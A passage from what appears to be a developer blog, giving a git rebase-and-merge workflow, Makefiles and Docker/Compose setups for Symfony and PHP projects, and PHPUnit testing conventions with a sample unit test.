git rebase origin/main
# Update remote feature branch
git push -fu origin FEAT-4423-my-feature
Super Secret Tip 2: Enable git's "Reuse Recorded Resolution" (aka "rerere"), for automatic conflict resolutions:
git config --global rerere.enabled true.This won't solve everything for you, but will save you time when the same conflict happens repeatedly.
The rebase command will move your commits after the ones in the main branch, keeping main as the foundation.

So for example, instead of having branches look like this:
* a1b2c3d - Merged in feature-x (pull request #123) (Dev A)
|\
| * e4f5g6h - Merge main into feature-x (Dev A)
| |\
* | | b7c8d9e - Merged in hotfix-y (pull request #124) (Dev B)
|\| |
| * | f1a2b3c - hotfix for critical bug (Dev B)
| |/
|/|
* | d4e5f6g - Merged in feature-z (pull request #122) (Dev C)
|\ \
| |/
|/|
* | h7i8j9k - refactor database layer (Dev C)
|/
*
With rebase it'd look like that:
* a1b2c3d - Merged in feature-x (pull request #123) (Dev A)
|\
| * e4f5g6h - implement feature x functionality (Dev A)
|/
* b7c8d9e - Merged in hotfix-y (pull request #124) (Dev B)
|\
| * f1a2b3c - hotfix for critical bug (Dev B)
|/
* d4e5f6g - Merged in feature-z (pull request #122) (Dev C)
|\
| * h7i8j9k - refactor database layer (Dev C)
|/
*
As you can see each feature is now a clean line of commits, making it easy to see what each feature contributed.
The linear, readable history allows us to identify merge commits we might want to revert, when we want to roll back a feature.
Super Secret Tip 3: To display branches with
git lg, set the following alias in your git config:
[alias]
# Logs history in a graph format with colours:
# * abbreviated commit hash in red
# * branch and tag names in cyan
# * commit title in white
# * author name in yellow
# * author date in green (format: `Mon, 02 Jan 2006 15:04:05 +0000`)
lg = log --graph --pretty=tformat:'%Cred%h%Creset -%C(cyan)%d %Creset%s (%C(yellow)%an%Creset %Cgreen%aD%Creset)' --abbrev-commit
Once tests pass, code quality checks are green, code review is approved, and overall the changes in the branch are production ready, you can finally merge it back to main:
# Update main
git checkout main
git pull --rebase origin main
# Double check you had the latest changes
git checkout -
git rebase main
## ⚠️ If there are new changes from main, redo all checks (test, code quality, etc)
# Merge your branch in main
git checkout main
git merge --no-ff FEAT-4423-my-feature
The --no-ff (no fast-forward) option will force git to create a merge commit,
which then makes it simple to undo a feature, using git revert -m 1 <merge-commit-hash>
(this will create a reverse diff of all the changes introduced by the merge).
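Here's the whole cycle, merge commit and revert included, demonstrated in a throwaway repository (file and commit names are made up for the demo):

```shell
# Throwaway-repo demo: merge a feature with --no-ff, then roll it back
# with `git revert -m 1` on the merge commit
set -e
repo=$(mktemp -d)
cd "$repo"
git init -q
git config user.email demo@example.com
git config user.name 'Demo'
git commit -q --allow-empty -m 'init'
git checkout -q -b FEAT-4423-my-feature
echo 'new code' > feature.txt
git add feature.txt
git commit -q -m 'FEAT-4423 add feature'
git checkout -q -                       # back to the default branch
git merge -q --no-ff --no-edit FEAT-4423-my-feature
git revert --no-edit -m 1 HEAD          # undo everything the merge introduced
test ! -e feature.txt && echo 'feature rolled back'
```

The `-m 1` tells git which parent of the merge commit is the mainline, so the revert produces a reverse diff of the feature branch's changes only.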
Note: Updated on 2026-02-23.
For a Docker-based Symfony project without Make, typing everyday commands, like running the tests, quickly becomes cumbersome:
docker compose exec app php vendor/bin/phpunit --testdox
Make allows you to define a list of "rules" that provide:
- shortcuts (make phpunit)
- parameters (make console env=prod)
- discoverability (running make to list available rules)
- composition (make app-qa is equivalent to make composer-dump; make cs-check; make phpstan; make rector-check; make phpunit)

With Make, the previous example becomes:
make phpunit arg=--testdox
In this article, I'm sharing the Makefiles I use for my Symfony / PHP projects.
Here are the rules I usually define:
# 🐳 Docker related rules
## Build the Docker images and start the services
make docker-init
## Check the services logs
make docker-compose arg='logs --tail=0 --follow'
## Stop the services
make docker-down
## Open interactive shell in container
make docker-bash
# 🐘 Project related rules
## Install composer dependencies
make composer-install
## Run the Symfony console
make console arg='cache:clear'
### To change the environment
make console env=prod arg='cache:clear'
# 🛂 Quality Assurance related rules
## Run composer-dump, phpstan, php-cs-fixer (check), rector (check) and phpunit
make app-qa
## To just run phpstan
make phpstan-analyze
## To just run php-cs-fixer check
make cs-check
## To just run phpunit
make phpunit
### To display technical specifications:
make phpunit arg='--testdox'
### To just run Integration tests:
make phpunit arg='./tests/Integration'
### To just run Unit tests:
make phpunit arg='./tests/Unit'
# Run php-cs-fixer fix (with Swiss Knife for namespaces)
make cs-fix
# Discover everything you can do
make
Here's the Makefile I use in Docker-based Symfony projects, which use a database
(with Docker Compose):
# Parameters (optional)
# * `arg`: arbitrary arguments to pass to rules (default: none)
# * `env`: used to set `APP_ENV` (default: `test`)
arg ?=
env ?= test
# Docker containers
PHP_SERVICE = app
# Executables
COMPOSER = docker compose exec $(PHP_SERVICE) composer
CONSOLE = docker compose exec -e APP_ENV=$(env) $(PHP_SERVICE) php bin/console
PHPUNIT = docker compose exec $(PHP_SERVICE) php vendor/bin/phpunit
PHP_CS_FIXER = docker compose exec $(PHP_SERVICE) php vendor/bin/php-cs-fixer
PHPSTAN = docker compose exec $(PHP_SERVICE) php vendor/bin/phpstan --memory-limit=256M
RECTOR = docker compose exec $(PHP_SERVICE) php vendor/bin/rector
SWISS_KNIFE = docker compose exec $(PHP_SERVICE) php vendor/bin/swiss-knife
# Misc
.DEFAULT_GOAL = help
.PHONY: *
## —— 🎵 🐳 The Symfony Docker Makefile 🐳 🎵 ——————————————————————————————————
## Based on https://github.com/dunglas/symfony-docker
## (arg) denotes the possibility to pass "arg=" parameter to the target
## this allows to add command and options, example: make composer arg='dump --optimize'
## (env) denotes the possibility to pass "env=" parameter to the target
## this allows to set APP_ENV environment variable (default: test), example: make console env='prod' arg='cache:warmup'
help: ## Outputs this help screen
@grep -E '(^[a-zA-Z0-9\./_-]+:.*?##.*$$)|(^##)' $(MAKEFILE_LIST) \
| awk 'BEGIN {FS = ":.*?## "}{printf "\033[32m%-30s\033[0m %s\n", $$1, $$2}' \
| sed -e 's/\[32m##/[33m/'
## —— Docker 🐳 ————————————————————————————————————————————————————————————————
docker: ## Runs Docker (arg, eg `arg='compose logs --tail=0 --follow'`)
@docker $(arg)
docker-compose: ## Runs Docker Compose (arg, eg `arg='logs --tail=0 --follow'`)
@docker compose $(arg)
docker-init: ## Builds the Docker images and starts the services in detached mode (no logs)
@docker compose build --pull
@docker compose up --detach
docker-down: ## Stops the services
@docker compose down --remove-orphans
docker-bash: ## Opens a (bash) shell in the container
@docker compose exec $(PHP_SERVICE) bash
## —— PHP 🐘 ———————————————————————————————————————————————————————————————————
composer: ## Runs Composer (arg, eg `arg='outdated'`)
@$(COMPOSER) $(arg)
composer-install: ## Install dependencies (arg, eg `arg='--no-dev'`)
@$(COMPOSER) install --optimize-autoloader $(arg)
composer-update: ## Updates dependencies (arg, eg `arg='--no-dev'`)
@$(COMPOSER) update --optimize-autoloader $(arg)
composer-dump: ## Dumps autoloader (arg, eg `arg='--classmap-authoritative'`)
@$(COMPOSER) dump-autoload --optimize --strict-psr --strict-ambiguous $(arg)
console: ## Runs bin/console (arg, eg `arg='cache:clear'`) (env, eg `env=prod`)
@$(CONSOLE) $(arg)
cs-check: ## Checks CS with PHP-CS-Fixer (arg, eg `arg='./src'`)
@$(PHP_CS_FIXER) check --verbose $(arg)
cs-fix: ## Fixes CS with Swiss Knife and PHP-CS-Fixer
@$(SWISS_KNIFE) namespace-to-psr-4 src --namespace-root 'App\\'
@$(SWISS_KNIFE) namespace-to-psr-4 tests --namespace-root 'App\\Tests\\'
@$(PHP_CS_FIXER) fix --verbose $(arg)
phpstan: ## Runs phpstan (arg, eg `arg='clear-result-cache'`)
@$(PHPSTAN) $(arg)
phpstan-analyze: ## Static Analysis with phpstan (arg, eg `arg='./src/'`)
@$(PHPSTAN) analyze $(arg)
swiss-knife: ## Automated refactorings with Swiss Knife (arg, eg `arg='namespace-to-psr-4 src --namespace-root \'App\\\''`)
@$(SWISS_KNIFE) $(arg)
phpunit: ## Runs the tests with PHPUnit (arg, eg `arg='./tests/Unit'`)
@docker compose exec $(PHP_SERVICE) sh bin/sfcc-if-stale.sh test
@$(PHPUNIT) $(arg)
rector-fix: ## Automated refactorings with Rector (arg, eg `arg='--clear-cache'`)
@$(RECTOR) $(arg)
rector-check: ## Refactoring checks with Rector
@$(RECTOR) process --dry-run
## —— App 📱 ———————————————————————————————————————————————————————————————————
app-init: ## First install / resetting (Docker build, up, etc)
@echo ''
@echo ' // Stopping docker services...'
@$(MAKE) docker-down
@echo ''
@echo ' // Starting docker services...'
@$(MAKE) docker-init
@echo ''
@echo ' // Installing Composer dependencies...'
@$(MAKE) composer-install
@echo ''
@echo ' [OK] App initialized'
app-clear: ## Clears the Symfony cache (env, eg `env='prod'`)
@$(CONSOLE) cache:clear
app-qa: ## Runs full QA pipeline (composer-dump, cs-check, phpstan, rector-check, phpunit)
@echo ''
@echo ' // Running composer dump...'
@$(MAKE) composer-dump
@echo ''
@echo ' // Running PHP CS Fixer...'
@$(MAKE) cs-check
@echo ''
@echo ' // Running PHPStan...'
@$(MAKE) phpstan
@echo ''
@echo ' // Running Rector...'
@$(MAKE) rector-check
@echo ''
@echo ' // Running PHPUnit...'
@$(MAKE) phpunit
@echo ''
@echo ' [OK] QA done'
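The `help` target is worth unpacking: grep keeps only lines annotated with `##`, and awk splits each one on the `:.*?## ` separator to print an aligned two-column screen. The pipeline can be tried in isolation (a simplified sketch, without the ANSI color codes and the final sed pass):

```shell
# Feed sample annotated Makefile lines through the same grep/awk pipeline
# (in the Makefile, `$` is escaped as `$$`; colors and the sed pass are omitted)
out=$(printf 'build: ## Compiles the app\ntest: ## Runs the tests\n' \
  | grep -E '(^[a-zA-Z0-9\./_-]+:.*?##.*$)|(^##)' \
  | awk 'BEGIN {FS = ":.*?## "}{printf "%-20s %s\n", $1, $2}')
echo "$out"
```

Each target name lands in the padded left column, its description in the right one.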
The phpunit rule calls a script that clears the Symfony cache only when stale,
since unlike dev, the test environment doesn't auto-invalidate on source changes:
#!/usr/bin/env bash
# File: /apps/qa/bin/sfcc-if-stale.sh
# ──────────────────────────────────────────────────────────────────────────────
# Symfony cache clear, but only if it's stale.
#
# Unlike dev, test and prod environments don't auto-invalidate cache when source
# files change. Changes to services, routes, Twig templates, Doctrine mappings,
# or environment variables all require a cache clear.
#
# This script detects stale cache by comparing modification times of src/,
# config/, and .env* files against the cache directory.
#
# Usage:
#
# ```shell
# bin/sfcc-if-stale.sh
# bin/sfcc-if-stale.sh prod
# ```
#
# Arguments:
#
# 1. `env`: Symfony environment, defaults to `test`
# ──────────────────────────────────────────────────────────────────────────────
_CLEAR_CACHE_ENV=${1:-test}
_CLEAR_CACHE_DIR="var/cache/${_CLEAR_CACHE_ENV}"
if [ ! -d "${_CLEAR_CACHE_DIR}" ]; then
echo " // Symfony cache directory does not exist, clearing..."
php bin/console cache:clear --env="${_CLEAR_CACHE_ENV}"
exit 0
fi
if [ -n "$(find src config .env* -newer "${_CLEAR_CACHE_DIR}" -print -quit 2>/dev/null)" ]; then
echo " // Symfony cache stale, clearing cache..."
php bin/console cache:clear --env="${_CLEAR_CACHE_ENV}"
exit 0
fi
echo " // Symfony cache is up to date"
If your project has no database (or other services) and therefore uses Docker directly (without Docker Compose), the Makefile could look like this:
# Parameters (optional)
# * `arg`: arbitrary arguments to pass to rules (default: none)
# * `env`: used to set `APP_ENV` (default: `test`)
arg ?=
env ?= test
# Executables (local)
DOCKER_RUN = docker run --rm -it -v "$(PWD)":/app --user $(shell id -u):$(shell id -g)
# Docker containers
PHP_SERVICE = app
PHP_CONT = $(DOCKER_RUN) $(PHP_SERVICE)
# Executables
COMPOSER = $(PHP_CONT) composer
CONSOLE = $(DOCKER_RUN) -e APP_ENV=$(env) $(PHP_SERVICE) php bin/console
PHPUNIT = $(PHP_CONT) php vendor/bin/phpunit
PHP_CS_FIXER = $(PHP_CONT) php vendor/bin/php-cs-fixer
PHPSTAN = $(PHP_CONT) php vendor/bin/phpstan --memory-limit=256M
RECTOR = $(PHP_CONT) php vendor/bin/rector
SWISS_KNIFE = $(PHP_CONT) php vendor/bin/swiss-knife
# Misc
.DEFAULT_GOAL = help
.PHONY: *
## —— 🎵 🐳 The Symfony Docker Makefile 🐳 🎵 ——————————————————————————————————
## Based on https://github.com/dunglas/symfony-docker
## (arg) denotes the possibility to pass "arg=" parameter to the target
## this allows adding commands and options, example: make composer arg='dump --optimize'
## (env) denotes the possibility to pass "env=" parameter to the target
## this allows setting the APP_ENV environment variable (default: test), example: make console env='prod' arg='cache:warmup'
help: ## Outputs this help screen
@grep -E '(^[a-zA-Z0-9\./_-]+:.*?##.*$$)|(^##)' $(MAKEFILE_LIST) \
| awk 'BEGIN {FS = ":.*?## "}{printf "\033[32m%-30s\033[0m %s\n", $$1, $$2}' \
| sed -e 's/\[32m##/[33m/'
## —— Docker 🐳 ————————————————————————————————————————————————————————————————
docker-init: ## Builds the Docker image
@docker build -t $(PHP_SERVICE) .
docker-bash: ## Opens a (bash) shell in the container
@$(DOCKER_RUN) $(PHP_SERVICE) bash
## —— PHP 🐘 ———————————————————————————————————————————————————————————————————
composer: ## Runs Composer (arg, eg `arg='outdated'`)
@$(COMPOSER) $(arg)
composer-install: ## Installs dependencies (arg, eg `arg='--no-dev'`)
@$(COMPOSER) install --optimize-autoloader $(arg)
composer-update: ## Updates dependencies (arg, eg `arg='--no-dev'`)
@$(COMPOSER) update --optimize-autoloader $(arg)
composer-dump: ## Dumps autoloader (arg, eg `arg='--classmap-authoritative'`)
@$(COMPOSER) dump-autoload --optimize --strict-psr --strict-ambiguous $(arg)
console: ## Runs bin/console (arg, eg `arg='cache:clear'`) (env, eg `env=prod`)
@$(CONSOLE) $(arg)
cs-check: ## Checks CS with PHP-CS-Fixer (arg, eg `arg='./src'`)
@$(PHP_CS_FIXER) check --verbose $(arg)
cs-fix: ## Fixes CS with Swiss Knife and PHP-CS-Fixer
@$(SWISS_KNIFE) namespace-to-psr-4 src --namespace-root 'App\\'
@$(SWISS_KNIFE) namespace-to-psr-4 tests --namespace-root 'App\\Tests\\'
@$(PHP_CS_FIXER) fix --verbose $(arg)
phpstan: ## Runs phpstan (arg, eg `arg='clear-result-cache'`)
@$(PHPSTAN) $(arg)
phpstan-analyze: ## Static Analysis with phpstan (arg, eg `arg='./src/'`)
@$(PHPSTAN) analyze $(arg)
swiss-knife: ## Automated refactorings with Swiss Knife (arg, eg `arg='namespace-to-psr-4 src --namespace-root \'App\\\''`)
@$(SWISS_KNIFE) $(arg)
phpunit: ## Runs the tests with PHPUnit (arg, eg `arg='./tests/Unit'`)
@$(PHPUNIT) $(arg)
rector-fix: ## Automated refactorings with Rector (arg, eg `arg='--clear-cache'`)
@$(RECTOR) $(arg)
rector-check: ## Refactoring checks with Rector
@$(RECTOR) process --dry-run
## —— App 📱 ———————————————————————————————————————————————————————————————————
app-init: ## First install
@echo ''
@echo ' // Building docker image...'
@$(MAKE) docker-init
@echo ''
@echo ' // Installing Composer dependencies...'
@$(MAKE) composer-install
@echo ''
@echo ' [OK] App initialized'
app-qa: ## Runs full QA pipeline (composer-dump, cs-check, phpstan, rector-check, phpunit)
@echo ''
@echo ' // Running composer dump...'
@$(MAKE) composer-dump
@echo ''
@echo ' // Running PHP CS Fixer...'
@$(MAKE) cs-check
@echo ''
@echo ' // Running PHPStan...'
@$(MAKE) phpstan
@echo ''
@echo ' // Running Rector...'
@$(MAKE) rector-check
@echo ''
@echo ' // Running PHPUnit...'
@$(MAKE) phpunit
@echo ''
@echo ' [OK] QA done'
For pure PHP projects without Symfony that don't run in Docker containers, the Makefile can look like this:
# Parameters (optional)
# * `arg`: arbitrary arguments to pass to rules (default: none)
# * `env`: used to set `APP_ENV` (default: `test`)
arg ?=
env ?= test
# Executables
PHP = php
COMPOSER = composer
PHPUNIT = php vendor/bin/phpunit
PHP_CS_FIXER = php vendor/bin/php-cs-fixer
PHPSTAN = php vendor/bin/phpstan --memory-limit=256M
RECTOR = php vendor/bin/rector
SWISS_KNIFE = php vendor/bin/swiss-knife
# Misc
.DEFAULT_GOAL = help
.PHONY: *
## —— 🎵 🐘 The Pure PHP Makefile 🐘 🎵 ——————————————————————————————————————
## Based on https://github.com/dunglas/symfony-docker
## (arg) denotes the possibility to pass "arg=" parameter to the target
## this allows adding commands and options, example: make composer arg='dump --optimize'
## (env) denotes the possibility to pass "env=" parameter to the target
## this allows setting the APP_ENV environment variable (default: test), example: make php env='prod' arg='script.php'
help: ## Outputs this help screen
@grep -E '(^[a-zA-Z0-9\./_-]+:.*?##.*$$)|(^##)' $(MAKEFILE_LIST) \
| awk 'BEGIN {FS = ":.*?## "}{printf "\033[32m%-30s\033[0m %s\n", $$1, $$2}' \
| sed -e 's/\[32m##/[33m/'
## —— PHP 🐘 ———————————————————————————————————————————————————————————————————
composer: ## Runs Composer (arg, eg `arg='outdated'`)
@$(COMPOSER) $(arg)
composer-install: ## Installs dependencies (arg, eg `arg='--no-dev'`)
@$(COMPOSER) install --optimize-autoloader $(arg)
composer-update: ## Updates dependencies (arg, eg `arg='--no-dev'`)
@$(COMPOSER) update --optimize-autoloader $(arg)
composer-dump: ## Dumps autoloader (arg, eg `arg='--classmap-authoritative'`)
@$(COMPOSER) dump-autoload --optimize --strict-psr --strict-ambiguous $(arg)
php: ## Runs PHP (arg, eg `arg='script.php'`) (env, eg `env=prod`)
@APP_ENV=$(env) $(PHP) $(arg)
cs-check: ## Checks CS with PHP-CS-Fixer (arg, eg `arg='./src'`)
@$(PHP_CS_FIXER) check --verbose $(arg)
cs-fix: ## Fixes CS with Swiss Knife and PHP-CS-Fixer
@$(SWISS_KNIFE) namespace-to-psr-4 src --namespace-root 'App\\'
@$(SWISS_KNIFE) namespace-to-psr-4 tests --namespace-root 'App\\Tests\\'
@$(PHP_CS_FIXER) fix --verbose $(arg)
phpstan: ## Runs phpstan (arg, eg `arg='clear-result-cache'`)
@$(PHPSTAN) $(arg)
phpstan-analyze: ## Static Analysis with phpstan (arg, eg `arg='./src/'`)
@$(PHPSTAN) analyze $(arg)
swiss-knife: ## Automated refactorings with Swiss Knife (arg, eg `arg='namespace-to-psr-4 src --namespace-root \'App\\\''`)
@$(SWISS_KNIFE) $(arg)
phpunit: ## Runs the tests with PHPUnit (arg, eg `arg='./tests/Unit'`)
@$(PHPUNIT) $(arg)
rector-fix: ## Automated refactorings with Rector (arg, eg `arg='--clear-cache'`)
@$(RECTOR) $(arg)
rector-check: ## Refactoring checks with Rector
@$(RECTOR) process --dry-run
## —— App 📱 ———————————————————————————————————————————————————————————————————
app-init: ## First install
@echo ''
@echo ' // Installing Composer dependencies...'
@$(MAKE) composer-install
@echo ''
@echo ' [OK] App initialized'
app-qa: ## Runs full QA pipeline (composer-dump, cs-check, phpstan, rector-check, phpunit)
@echo ''
@echo ' // Running composer dump...'
@$(MAKE) composer-dump
@echo ''
@echo ' // Running PHP CS Fixer...'
@$(MAKE) cs-check
@echo ''
@echo ' // Running PHPStan...'
@$(MAKE) phpstan
@echo ''
@echo ' // Running Rector...'
@$(MAKE) rector-check
@echo ''
@echo ' // Running PHPUnit...'
@$(MAKE) phpunit
@echo ''
@echo ' [OK] QA done'
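The `php` target's `@APP_ENV=$(env) $(PHP) $(arg)` relies on the shell's per-command environment assignment: the variable is exported to that single child process and never leaks into the calling shell. A quick demonstration, with `sh` standing in for `php`:

```shell
unset APP_ENV

# The assignment prefix makes the variable visible to the child process only...
APP_ENV=prod sh -c 'echo "child sees APP_ENV=$APP_ENV"'

# ...the calling shell itself never had it set
echo "parent sees APP_ENV=${APP_ENV:-<unset>}"
```

This prints `child sees APP_ENV=prod`, then `parent sees APP_ENV=<unset>`.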
With this, you can streamline your development workflow across projects and focus on writing code instead of remembering complex Docker commands.
Note: I took massive inspiration from Kevin Dunglas' Symfony Docker Makefile.
I'm describing here a solution that ensures a consistent development environment and lets you run the project locally with just a few commands, without having to worry about setting up a database, search engine, message queue, or other services.
The following Dockerfile will build an image with PHP, bash, Composer, the PostgreSQL libraries, and the Symfony CLI:
# syntax=docker/dockerfile:1
###
# PHP Dev Container
# Utility Tools: PHP, bash, Composer, PostgreSQL, Symfony CLI
###
FROM php:8.3-cli-alpine AS php_dev_container
# Composer environment variables:
# * default user is superuser (root), so allow them
# * put cache directory in a readable/writable location
# _Note_: When running `composer` in container, use `--no-cache` option
ENV COMPOSER_ALLOW_SUPERUSER=1 \
COMPOSER_CACHE_DIR=/tmp/.composer/cache
# Install dependencies:
# * bash for shell access and scripting
# * postgresql for the database
# * zip for composer packages that use ZIP archives
# _Note (Alpine)_: `--no-cache` includes `--update` and keeps image size minimal
#
# Then install PHP extensions
#
# _Note (Hadolint)_: No version locking, since Alpine only ever provides one version
# hadolint ignore=DL3018
RUN apk add --update --no-cache \
bash \
libzip-dev \
postgresql-dev \
zip \
&& docker-php-ext-install \
bcmath \
zip \
pdo_pgsql
# Copy Symfony CLI binary from image
# _Note_: Avoid using Symfony CLI installer, use Docker image instead
# See: https://github.com/symfony-cli/symfony-cli/issues/195#issuecomment-1273269735
# _Note (Hadolint)_: False positive as `COPY` works with images too
# See: https://github.com/hadolint/hadolint/issues/197#issuecomment-1016595425
# hadolint ignore=DL3022
COPY --from=ghcr.io/symfony-cli/symfony-cli:v5 /usr/local/bin/symfony /usr/local/bin/symfony
# Copy Composer binary from composer image
# _Note (Hadolint)_: False positive as `COPY` works with images too
# See: https://github.com/hadolint/hadolint/issues/197#issuecomment-1016595425
# hadolint ignore=DL3022
COPY --from=composer:2 /usr/bin/composer /usr/bin/composer
WORKDIR /app
# Caching `composer install`, as long as composer.{json,lock} don't change.
COPY composer.json composer.lock ./
RUN composer install \
--no-cache \
--no-interaction \
--no-plugins \
--no-scripts \
--optimize-autoloader
# Copy the remaining application files (excluding those listed in .dockerignore)
COPY . .
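Copying `composer.{json,lock}` before the rest of the sources is what makes the caching work: Docker keys each `COPY` layer on a checksum of the copied files, so the expensive `composer install` layer is only rebuilt when those two files actually change. Conceptually, the cache key behaves like this (a simplified sketch of the idea, not Docker's actual implementation):

```shell
# Hypothetical sketch: a layer-cache key derived from the copied files' content
printf '{"require": {"php": ">=8.3"}}\n' > composer.json
printf '{"content-hash": "demo"}\n' > composer.lock
key=$(cat composer.json composer.lock | sha256sum | awk '{print $1}')
echo "layer cache key: $key"

# Identical content yields the identical key, so the cached layer is reused;
# editing files under src/ never touches this key, only composer.{json,lock} do
key2=$(cat composer.json composer.lock | sha256sum | awk '{print $1}')
test "$key" = "$key2" && echo "cache hit"
```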
You can check the validity of your Dockerfile syntax with hadolint.
Here's how to build the image, and then run the container.
Note: `-v "$(PWD)":/app` mounts the current directory for live code changes.
docker build -t app .
# Run with interactive shell
docker run --rm -it -v "$(PWD)":/app app bash
# Run composer
docker run --rm -it -v "$(PWD)":/app app symfony composer install -o
# Run symfony's console
docker run --rm -it -v "$(PWD)":/app -e APP_ENV=prod app symfony console
# Run PHPUnit, phpstan, PHP CS Fixer
docker run --rm -it -v "$(PWD)":/app app symfony php vendor/bin/phpunit
docker run --rm -it -v "$(PWD)":/app app symfony php vendor/bin/phpstan analyze
docker run --rm -it -v "$(PWD)":/app app symfony php vendor/bin/php-cs-fixer check --verbose
docker run --rm -it -v "$(PWD)":/app app symfony php vendor/bin/php-cs-fixer fix --verbose
# Start Symfony CLI's web server
docker run --rm -it -v "$(PWD)":/app -p 8000:8000 app symfony server:start --port=8000 --host=0.0.0.0
When using COPY . . in the Dockerfile, it's useful to limit what gets copied, with a .dockerignore:
## composer
vendor
## git
.git/
## friendsofphp/php-cs-fixer
.php-cs-fixer.php
.php-cs-fixer.cache
## phpstan/phpstan
phpstan.neon
## phpunit/phpunit
phpunit.xml
.phpunit.cache
## symfony/framework-bundle
.env.local
.env.local.php
.env.*.local
var/cache/
var/log/
When the PHP application relies on other services,
such as a database (eg PostgreSQL), search engine (eg Elasticsearch), or message queue (eg RabbitMQ),
having a compose.yaml file will make the development experience much smoother
by handling services, networking, and volumes automatically:
services:
app:
build: .
# Mount current directory into container for live code changes
volumes:
- .:/app
# Database should be started first
depends_on:
- db
ports:
- "8000:8000"
command: symfony serve --no-tls --port=8000 --listen-ip=0.0.0.0
db:
image: postgres:${POSTGRES_VERSION:-16}-alpine
environment:
POSTGRES_DB: ${POSTGRES_DB:-app}
POSTGRES_PASSWORD: ${POSTGRES_PASSWORD:-ChangeMe}
POSTGRES_USER: ${POSTGRES_USER:-app}
# Persist database data between container restarts
volumes:
- db-data:/var/lib/postgresql/data:rw
# Port mapping to avoid conflict with locally running PostgreSQL
ports:
- "5433:5432"
# Define the db-data volume used above
volumes:
db-data:
With Docker Compose, the usage commands are a bit different:
# Build docker images
docker compose build --pull
# Start services (no logs)
docker compose up --detach
# Show live logs
docker compose logs --tail=0 --follow
# Stop services
docker compose down --remove-orphans
# Run with interactive shell
docker compose exec app bash
# Run composer
docker compose exec app symfony composer
# Run symfony's console
docker compose exec -e APP_ENV=prod app symfony console
# Run PHPUnit, phpstan, PHP CS Fixer
docker compose exec -e APP_ENV=prod app symfony php vendor/bin/phpunit
docker compose exec -e APP_ENV=prod app symfony php vendor/bin/phpstan analyze
docker compose exec -e APP_ENV=prod app symfony php vendor/bin/php-cs-fixer check --verbose
docker compose exec -e APP_ENV=prod app symfony php vendor/bin/php-cs-fixer fix --verbose
To set up SQLite, you'll need to modify the Dockerfile:
RUN apk add --update --no-cache \
...
sqlite \
&& docker-php-ext-install \
...
pdo_sqlite
As well as compose.yaml:
services:
app:
...
volumes:
...
# Mount SQLite database directory to persist data
- sqlite-data:/app/var/data
volumes:
...
sqlite-data:
This assumes your SQLite database file is located in the project's var/data folder.
Make sure to set the following environment variable in .env:
DATABASE_URL="sqlite:///%kernel.project_dir%/var/data/database.sqlite"
For RabbitMQ, modify the Dockerfile:
RUN apk add --update --no-cache \
...
rabbitmq-c-dev \
&& docker-php-ext-install \
...
sockets \
&& pecl install amqp \
&& docker-php-ext-enable amqp
Also compose.yaml:
services:
app:
...
depends_on:
...
- rabbitmq
rabbitmq:
image: rabbitmq:${RABBITMQ_VERSION:-3.13}-management-alpine
environment:
RABBITMQ_DEFAULT_USER: ${RABBITMQ_USER:-app}
RABBITMQ_DEFAULT_PASS: ${RABBITMQ_PASSWORD:-ChangeMe}
# Persist RabbitMQ data between container restarts
volumes:
- rabbitmq-data:/var/lib/rabbitmq:rw
ports:
# Port mapping to avoid conflict with locally running RabbitMQ
- "5673:5672"
# Management UI port
- "15673:15672"
volumes:
...
rabbitmq-data:
Again, make sure to set the following environment variable in .env:
RABBITMQ_URL="amqp://app:ChangeMe@rabbitmq:5672/"
The RabbitMQ management interface will be available at http://localhost:15673, with the credentials defined in the environment variables.
Here's a list of helpful commands to maintain the images and containers:
- `docker images`: lists images
- `docker images --filter dangling=true`: lists untagged / unused images
- `docker container ls`: lists running containers
- `docker container ls -a`: lists running and stopped containers
- `docker system prune`: removes dangling containers, networks and images
- `docker system prune --volumes`: removes dangling containers, networks, volumes and images
- `docker history <image>`: inspects the layers of an image

With this, we can finally write bugs once, and run them everywhere!
Edit: brought up to date on 2026-02-27.
Forge battle-tested code, under the hammer of PHPUnit.
Here's a unit test for a Username value object:
<?php
declare(strict_types=1);
namespace App\Tests\Unit;
use PHPUnit\Framework\Attributes\CoversClass;
use PHPUnit\Framework\Attributes\DataProvider;
use PHPUnit\Framework\Attributes\Small;
use PHPUnit\Framework\Attributes\TestDox;
use PHPUnit\Framework\TestCase;
#[CoversClass(Username::class)]
#[Small]
final class UsernameTest extends TestCase
{
private function username(string $value = 'Merlin'): Username
{
return Username::fromString($value);
}
#[TestDox('It can be converted from/to string')]
public function test_it_can_be_converted_from_and_to_string(): void
{
$this->assertSame('Merlin', $this->username()->toString());
}
#[DataProvider('invalidUsernameProvider')]
#[TestDox('It fails when raw username $scenario')]
public function test_it_fails_when_raw_username_is_invalid(
string $scenario,
string $invalidUsername,
): void {
$this->expectException(ValidationFailedException::class);
$this->username($invalidUsername);
}
/**
* @return \Iterator<array{
* scenario: string,
* invalidUsername: string,
* }>
*/
public static function invalidUsernameProvider(): \Iterator
{
yield ['scenario' => 'is empty', 'invalidUsername' => ''];
yield ['scenario' => 'is too short (< 4 characters)', 'invalidUsername' => 'abc'];
yield ['scenario' => 'is too long (> 15 characters)', 'invalidUsername' => 'abcdefghijklmnop'];
}
}
Prefer private factory methods over `setUp()` to create the System Under Test (SUT):
- `setUp()` runs before every test, even those that don't need it

Warning: PHPUnit creates one instance of each test class per test method and per data provider row, and keeps them all in memory until the testsuite completes.
Attributes (`#[<Name>]`) were introduced in PHP 8 and PHPUnit 10; they replace Annotations (PHPDoc `@<Name>`), which were deprecated in PHPUnit 10 and removed in PHPUnit 12.
Their goal is to make PHP tooling more robust and IDE integration more reliable, so use them!
Specify the targeted class:
- `#[CoversClass]`: enforces proper test boundaries, prevents accidental coverage, and makes the intent clearer both to readers and tools (code coverage, static analysis, etc)
- `#[UsesClass]`: if code from other classes is expected to be used

Categorize tests based on their scope, complexity and resource usage:
- `#[Small]` for testing individual components in isolation (unit), fast execution (typically under 100ms)
- `#[Medium]` for testing multiple components together in isolation (integration), moderate execution (typically under 1s)
- `#[Large]` for complete workflows (end to end), slow execution (over 1s)
- `#[Group]` for arbitrary categories (including temporary ones, eg `wip`)

Use Data Providers to test different sets of inputs / outputs:
- `#[DataProvider(string $publicStaticMethodName)]` for a method in the test class
- `#[DataProviderExternal(string $className, string $publicStaticMethodName)]` for a method in a different class from the test one
- `#[TestWith(array $data)]` to provide one set at a time, without having to declare a static method

Run PHPUnit with the `--testdox` option to get executable specifications:
- `#[TestDox(string $text)]` to customize what PHPUnit will display

Use `\Iterator` with `yield` and named parameters for readable data providers, combined with `#[TestDox]` and a `$scenario` variable (as shown in the `UsernameTest` example above).
Output with --testdox:
Username
✔ It can be converted from/to string
✔ It fails when raw username is empty
